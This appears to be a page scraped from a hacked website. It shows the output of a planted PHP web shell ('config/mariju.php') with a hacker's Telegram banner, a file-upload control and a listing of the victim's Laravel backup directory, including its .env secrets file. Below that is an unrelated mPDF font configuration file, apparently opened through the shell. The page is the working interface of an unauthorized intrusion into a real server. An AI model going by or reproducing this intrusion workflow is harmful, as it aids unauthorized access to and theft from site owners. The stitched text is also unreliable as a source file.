telegram : @iamdarkcomedy i am hacker

path :/home/bisorgosof24/public_html/Backup23122024

upload file:

List of files:

name file size edit permission action
.env2733 KBDecember 22 2024 06:20:070644
404.html58370 KBNovember 20 2024 15:32:220644
502.html58368 KBNovember 20 2024 15:32:220644
Modules-December 11 2024 21:02:560755
README.md4158 KBFebruary 14 2023 12:31:560644
app-December 11 2024 17:57:480755
artisan1686 KBFebruary 14 2023 12:31:560644
bootstrap-December 11 2024 20:23:360755
composer.json3761 KBDecember 11 2024 22:15:000644
composer.lock512048 KBDecember 11 2024 22:13:280644
config-June 15 2025 02:09:360755
database-December 05 2024 20:18:120755
dfsdf dfds fd fds findex.html1420 KBNovember 20 2024 15:32:240644
error_log24146057 KBJuly 19 2025 00:15:230644
firoz-December 23 2024 13:24:460755
index.php1667 KBDecember 14 2024 05:20:360644
lang-December 11 2024 21:02:480755
modules_statuses.json472 KBNovember 20 2024 15:32:240644
mpos-March 31 2025 02:36:310755
package.json226 KBFebruary 14 2023 12:31:560644
phpunit.xml1146 KBFebruary 14 2023 12:31:560644
public-March 31 2025 02:36:310755
resources-December 11 2024 21:10:220755
routes-June 15 2025 02:09:310755
storage-December 11 2024 21:12:440755
tests-December 05 2024 20:18:120755
vendor-December 11 2024 22:13:300755
vite.config.js263 KBFebruary 14 2023 12:31:560644

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 227

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 228

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 229

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 230
defaults = [ // Specify which font metrics to use: // - 'winTypo uses sTypoAscender etc from the OS/2 table and is the one usually recommended - BUT // - 'win' use WinAscent etc from OS/2 and inpractice seems to be used more commonly in Windows environment // - 'mac' uses Ascender etc from hhea table, and is used on Mac/OSX environment 'fontDescriptor' => 'win', // For custom fonts data folder set config key 'fontDir'. It can also be an array of directories, // first found file will then be returned // Optionally set font(s) (names as defined below in 'fontdata') to use for missing characters // when using useSubstitutions. Use a font with wide coverage - dejavusanscondensed is a good start // only works using subsets (otherwise would add very large file) // More than 1 font can be specified but each will add to the processing time of the script 'backupSubsFont' => ['dejavusanscondensed', 'freesans', 'sun-exta'], // Optionally set a font (name as defined below in 'fontdata') to use for CJK characters // in Plane 2 Unicode (> U+20000) when using useSubstitutions. // Use a font like hannomb or sun-extb if available // only works using subsets (otherwise would add very large file) 'backupSIPFont' => 'sun-extb', /* This array defines translations from font-family in CSS or HTML to the internal font-family name used in mPDF. Can include as many as want, regardless of which fonts are installed. By default mPDF will take a CSS/HTML font-family and remove spaces and change to lowercase e.g. "Times New Roman" will be recognised as "timesnewroman" You only need to define additional translations. You can also use it to define specific substitutions e.g. 'helvetica' => 'arial' Generic substitutions (i.e. to a sans-serif or serif font) are set by including the font-family in e.g. 'sans_fonts' below */ 'fonttrans' => [ 'times' => 'timesnewroman', 'courier' => 'couriernew', 'trebuchet' => 'trebuchetms', 'comic' => 'comicsansms', 'franklin' => 'franklingothicbook', 'ocr-b' => 'ocrb', 'ocr-b10bt' => 'ocrb', 'damase' => 'mph2bdamase', ], /* This array lists the file names of the TrueType .ttf or .otf font files for each variant of the (internal mPDF) font-family name. ['R'] = Regular (Normal), others are Bold, Italic, and Bold-Italic Each entry must contain an ['R'] entry, but others are optional. Only the font (files) entered here will be available to use in mPDF. Put preferred default first in order This will be used if a named font cannot be found in any of 'sans_fonts', 'serif_fonts' or 'mono_fonts' ['sip-ext'] = 'sun-extb', name a related font file containing SIP characters ['useOTL'] => 0xFF, Enable use of OTL features. ['useKashida'] => 75, Enable use of kashida for text justification in Arabic text If a .ttc TrueType collection file is referenced, the number of the font within the collection is required. Fonts in the collection are numbered starting at 1, as they appear in the .ttc file e.g. "cambria" => array( 'R' => "cambria.ttc", 'B' => "cambriab.ttf", 'I' => "cambriai.ttf", 'BI' => "cambriaz.ttf", 'TTCfontID' => array( 'R' => 1, ), ), "cambriamath" => array( 'R' => "cambria.ttc", 'TTCfontID' => array( 'R' => 2, ), ), */ 'fontdata' => [ "dejavusanscondensed" => [ 'R' => "DejaVuSansCondensed.ttf", 'B' => "DejaVuSansCondensed-Bold.ttf", 'I' => "DejaVuSansCondensed-Oblique.ttf", 'BI' => "DejaVuSansCondensed-BoldOblique.ttf", 'useOTL' => 0xFF, 'useKashida' => 75, ], "dejavusans" => [ 'R' => "DejaVuSans.ttf", 'B' => "DejaVuSans-Bold.ttf", 'I' => "DejaVuSans-Oblique.ttf", 'BI' => "DejaVuSans-BoldOblique.ttf", 'useOTL' => 0xFF, 'useKashida' => 75, ], "dejavuserif" => [ 'R' => "DejaVuSerif.ttf", 'B' => "DejaVuSerif-Bold.ttf", 'I' => "DejaVuSerif-Italic.ttf", 'BI' => "DejaVuSerif-BoldItalic.ttf", ], "dejavuserifcondensed" => [ 'R' => "DejaVuSerifCondensed.ttf", 'B' => "DejaVuSerifCondensed-Bold.ttf", 'I' => "DejaVuSerifCondensed-Italic.ttf", 'BI' => "DejaVuSerifCondensed-BoldItalic.ttf", ], "dejavusansmono" => [ 'R' => "DejaVuSansMono.ttf", 'B' => "DejaVuSansMono-Bold.ttf", 'I' => "DejaVuSansMono-Oblique.ttf", 'BI' => "DejaVuSansMono-BoldOblique.ttf", 'useOTL' => 0xFF, 'useKashida' => 75, ], "freesans" => [ 'R' => "FreeSans.ttf", 'B' => "FreeSansBold.ttf", 'I' => "FreeSansOblique.ttf", 'BI' => "FreeSansBoldOblique.ttf", 'useOTL' => 0xFF, ], "freeserif" => [ 'R' => "FreeSerif.ttf", 'B' => "FreeSerifBold.ttf", 'I' => "FreeSerifItalic.ttf", 'BI' => "FreeSerifBoldItalic.ttf", 'useOTL' => 0xFF, 'useKashida' => 75, ], "freemono" => [ 'R' => "FreeMono.ttf", 'B' => "FreeMonoBold.ttf", 'I' => "FreeMonoOblique.ttf", 'BI' => "FreeMonoBoldOblique.ttf", ], /* OCR-B font for Barcodes */ "ocrb" => [ 'R' => "ocrb10.ttf", ], /* Miscellaneous language font(s) */ "estrangeloedessa" => [/* Syriac */ 'R' => "SyrCOMEdessa.otf", 'useOTL' => 0xFF, ], "kaputaunicode" => [/* Sinhala */ 'R' => "kaputaunicode.ttf", 'useOTL' => 0xFF, ], "abyssinicasil" => [/* Ethiopic */ 'R' => "Abyssinica_SIL.ttf", 'useOTL' => 0xFF, ], "aboriginalsans" => [/* Cherokee and Canadian */ 'R' => "AboriginalSansREGULAR.ttf", ], "jomolhari" => [/* Tibetan */ 'R' => "Jomolhari.ttf", 'useOTL' => 0xFF, ], "sundaneseunicode" => [/* Sundanese */ 'R' => "SundaneseUnicode-1.0.5.ttf", 'useOTL' => 0xFF, ], "taiheritagepro" => [/* Tai Viet */ 'R' => "TaiHeritagePro.ttf", ], "aegean" => [ 'R' => "Aegean.otf", 'useOTL' => 0xFF, ], "aegyptus" => [ 'R' => "Aegyptus.otf", 'useOTL' => 0xFF, ], "akkadian" => [/* Cuneiform */ 'R' => "Akkadian.otf", 'useOTL' => 0xFF, ], "quivira" => [ 'R' => "Quivira.otf", 'useOTL' => 0xFF, ], "eeyekunicode" => [/* Meetei Mayek */ 'R' => "Eeyek.ttf", ], "lannaalif" => [/* Tai Tham */ 'R' => "lannaalif-v1-03.ttf", 'useOTL' => 0xFF, ], "daibannasilbook" => [/* New Tai Lue */ 'R' => "DBSILBR.ttf", ], "garuda" => [/* Thai */ 'R' => "Garuda.ttf", 'B' => "Garuda-Bold.ttf", 'I' => "Garuda-Oblique.ttf", 'BI' => "Garuda-BoldOblique.ttf", 'useOTL' => 0xFF, ], "khmeros" => [/* Khmer */ 'R' => "KhmerOS.ttf", 'useOTL' => 0xFF, ], "dhyana" => [/* Lao fonts */ 'R' => "Dhyana-Regular.ttf", 'B' => "Dhyana-Bold.ttf", 'useOTL' => 0xFF, ], "tharlon" => [/* Myanmar / Burmese */ 'R' => "Tharlon-Regular.ttf", 'useOTL' => 0xFF, ], "padaukbook" => [/* Myanmar / Burmese */ 'R' => "Padauk-book.ttf", 'useOTL' => 0xFF, ], "zawgyi-one" => [/* Myanmar / Burmese */ 'R' => "ZawgyiOne.ttf", 'useOTL' => 0xFF, ], "ayar" => [/* Myanmar / Burmese */ 'R' => "ayar.ttf", 'useOTL' => 0xFF, ], "taameydavidclm" => [/* Hebrew with full Niqud and Cantillation */ 'R' => "TaameyDavidCLM-Medium.ttf", 'useOTL' => 0xFF, ], /* SMP */ "mph2bdamase" => [ 'R' => "damase_v.2.ttf", ], /* Indic */ "lohitkannada" => [ 'R' => "Lohit-Kannada.ttf", 'useOTL' => 0xFF, ], "pothana2000" => [ 'R' => "Pothana2000.ttf", 'useOTL' => 0xFF, ], /* Arabic fonts */ "xbriyaz" => [ 'R' => "XB Riyaz.ttf", 'B' => "XB RiyazBd.ttf", 'I' => "XB RiyazIt.ttf", 'BI' => "XB RiyazBdIt.ttf", 'useOTL' => 0xFF, 'useKashida' => 75, ], "lateef" => [/* Sindhi, Pashto and Urdu */ 'R' => "LateefRegOT.ttf", 'useOTL' => 0xFF, 'useKashida' => 75, ], "kfgqpcuthmantahanaskh" => [/* KFGQPC Uthman Taha Naskh - Koranic */ 'R' => "Uthman.otf", 'useOTL' => 0xFF, 'useKashida' => 75, ], /* CJK fonts */ "sun-exta" => [ 'R' => "Sun-ExtA.ttf", 'sip-ext' => 'sun-extb', /* SIP=Plane2 Unicode (extension B) */ ], "sun-extb" => [ 'R' => "Sun-ExtB.ttf", ], "unbatang" => [/* Korean */ 'R' => "UnBatang_0613.ttf", ], ], // Add fonts to this array if they contain characters in the SIP or SMP Unicode planes // but you do not require them. This allows a more efficient form of subsetting to be used. 'BMPonly' => [ "dejavusanscondensed", "dejavusans", "dejavuserifcondensed", "dejavuserif", "dejavusansmono", ], // These next 3 arrays do two things: // 1. If a font referred to in HTML/CSS is not available to mPDF, these arrays will determine whether // a serif/sans-serif or monospace font is substituted // 2. The first font in each array will be the font which is substituted in circumstances as above // (Otherwise the order is irrelevant) // Use the mPDF font-family names i.e. lowercase and no spaces (after any translations in $fonttrans) // Always include "sans-serif", "serif" and "monospace" etc. 'sans_fonts' => ['dejavusanscondensed', 'sans', 'sans-serif', 'cursive', 'fantasy', 'dejavusans', 'freesans', 'liberationsans', 'arial', 'helvetica', 'verdana', 'geneva', 'lucida', 'arialnarrow', 'arialblack', 'franklin', 'franklingothicbook', 'tahoma', 'garuda', 'calibri', 'trebuchet', 'lucidagrande', 'microsoftsansserif', 'trebuchetms', 'lucidasansunicode', 'franklingothicmedium', 'albertusmedium', 'xbriyaz', 'albasuper', 'quillscript', 'humanist777', 'humanist777black', 'humanist777light', 'futura', 'hobo', 'segoeprint' ], 'serif_fonts' => ['dejavuserifcondensed', 'serif', 'dejavuserif', 'freeserif', 'liberationserif', 'timesnewroman', 'times', 'centuryschoolbookl', 'palatinolinotype', 'centurygothic', 'bookmanoldstyle', 'bookantiqua', 'cyberbit', 'cambria', 'norasi', 'charis', 'palatino', 'constantia', 'georgia', 'albertus', 'xbzar', 'algerian', 'garamond', ], 'mono_fonts' => ['dejavusansmono', 'mono', 'monospace', 'freemono', 'liberationmono', 'courier', 'ocrb', 'ocr-b', 'lucidaconsole', 'couriernew', 'monotypecorsiva' ], ]; } public function getDefaults() { return $this->defaults; } }